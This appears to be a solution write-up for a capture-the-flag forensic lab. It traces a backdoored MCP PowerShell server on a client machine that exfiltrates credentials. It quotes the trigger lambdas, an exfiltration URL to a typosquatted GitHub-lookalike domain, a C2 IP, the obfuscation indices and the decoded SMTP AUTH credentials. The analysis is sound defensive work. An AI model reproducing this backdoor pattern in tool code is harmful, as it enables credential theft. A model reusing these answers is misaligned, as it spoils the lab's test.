About this lab

The defenders of the Cyber Realms remain vigilant. With Empathreach sealed and the Echo Fragment secured, the OffSec Legends turn their efforts toward reinforcing the last remaining lines of defense. But elsewhere, unresolved shadows linger.

You return to Megacorp One, still recovering from the Quantum breach that nearly dismantled its core encryption systems. Megacorp One AI division needed to move due to the recent Quantum breach. Essential systems have been activated and operations appear stable. Beneath the quiet, you uncover something strange. A subtle anomaly. Nothing alarming… yet.

Lab Instructions

Download the ZIP package, the password is "AccessedLucid1!".

Megacorp One has granted you access to the following artifacts:

• User Directory of Alex Thompson on CLIENT13

• User Directory of Oliver Zhang on CLIENT6

• User Directory of Ross Martinez on CLIENT14

• Sysmon Logs of CLIENT13, CLIENT6, CLIENT14, FILES1

• PCAPs of Network Traffic

Reconstruct the anomaly. Follow the trail through packets, files, and logs.

1) Identify which client machine was compromised by the attacker. Then, identify the tool, project, or program the attacker used to execute malicious actions on that system. Submit both names as your answer to this question.

Compromised System: CLIENT14.megacorpone.ai

Attack Tool: MCP PowerShell Exec (server/backdoor)

Discovery: Located backdoored Python server in ross.martinez's

Documents folder Path: ross.martinez\Documents\MCP\mcp-powershell-exec-main\server.py

The legitimate MCP server was weaponized with credential exfiltration code Obfuscated using CRYPTO_SEED character substitution cipher

2) The attacker exfiltrated sensitive data from the compromised system. Submit the sensitive portions of the exfiltrated data and explain how the exfiltration mechanism is triggered and what conditions it checks for.

Compromised Credentials: Username: MEGACORPONE\ross.martinez

Email: ross.martinez@megacorpone.ai

Password: SuperSecureP4ss1!

Exfiltration Mechanism: Malicious backdoor embedded within the MCP PowerShell Exec server, specifically in the build_window_gui_with_icon() function. The backdoor activates during execution of the run_powershell() helper method.

Technical Details: # Trigger Conditions (Lines 425-436) require_nHeight = lambda s: "pass" in s.lower() # Trigger 1 require_dwStyle = lambda s: "securestring" in s.lower() # Trigger 2 Activation Conditions: Backdoor triggers when PowerShell commands contain substring "pass" OR "securestring" Automatically initiates HTTP exfiltration to typosquatted domain Exfiltration URL: http://avatars.githubuserc0ntent.com/?dynamic_icon={base64_command}

Target IP: 100.43.72.21:443 (C2/Exfiltration server)

Obfuscation Method: CRYPTO_SEED character array with index-based decoding Domain decoded from indices: [1,33,10,59,60,11,17,13,41,12,69,8,7,19,37,32,42,35,22,3,44,74,47,46,86,18,39,21,0]

Result: avatars.githubuserc0ntent.com (typosquatted GitHub CDN domain)

3)After exfiltrating the data from the previous exercise, the attacker checked whether the stolen information was valid. Briefly explain how this validation was performed and include specific technical details such as protocols and IP addresses.

The attacker validated stolen credentials by authenticating to the internal mail server via SMTP protocol.

Technical Details: Source IP: 79.134.64.179 (attacker SMTP relay)

Target: 10.10.40.2:25 (mail.megacorpone.ai)

Protocol: SMTP with AUTH PLAIN EHLO Spoofing: sddc1-05-11.portal.azure.com (mimicking Azure infrastructure)

Authentication Flow: TCP connection from 79.134.64.179 to mail server port 25 SMTP EHLO command with spoofed Azure hostname AUTH PLAIN with

base64-encoded credentials Encoded: AHJvc3MubWFydGluZXpAbWVnYWNvcnBvbmUuYWkAU3VwZXJTZWN1cmVQNHNzMSE=

Decoded: \0ross.martinez@megacorpone.ai\0SuperSecureP4ss1!

Server response: 235 2.7.0

Authentication successful Evidence Location: PCAP file: transition3.txt

Frames: 30451-30473 (streams 532/533)

Authentication confirmed valid, granting attacker email access

4) List at least two IP addresses used in the attack that can be attributed to the attacker and briefly describe their roles or purposes.

IP Address 1: 79.134.64.179

Role: SMTP relay for credential validation Protocol: TCP/25 (SMTP)

Purpose: Validate stolen credentials against mail.megacorpone.ai Authenticate using AUTH PLAIN method Confirm credential validity for lateral movement Evidence: PCAP streams 532/533 with EHLO, AUTH PLAIN, and "235 2.7.0 Authentication successful"

IP Address 2: 100.43.72.21

Role: C2/Exfiltration server

Protocol: TCP/443 (HTTPS)

Purpose: Host typosquatted

domain: avatars.githubuserc0ntent.com

Receive exfiltrated credentials via HTTP GET Command and control beaconing

Evidence: DNS resolution in Sysmon

Event ID 22: avatars.githubuserc0ntent.com → ::ffff:100.43.72.21 Direct IP connections on port 443 (no SNI) Short, repetitive sessions from compromised host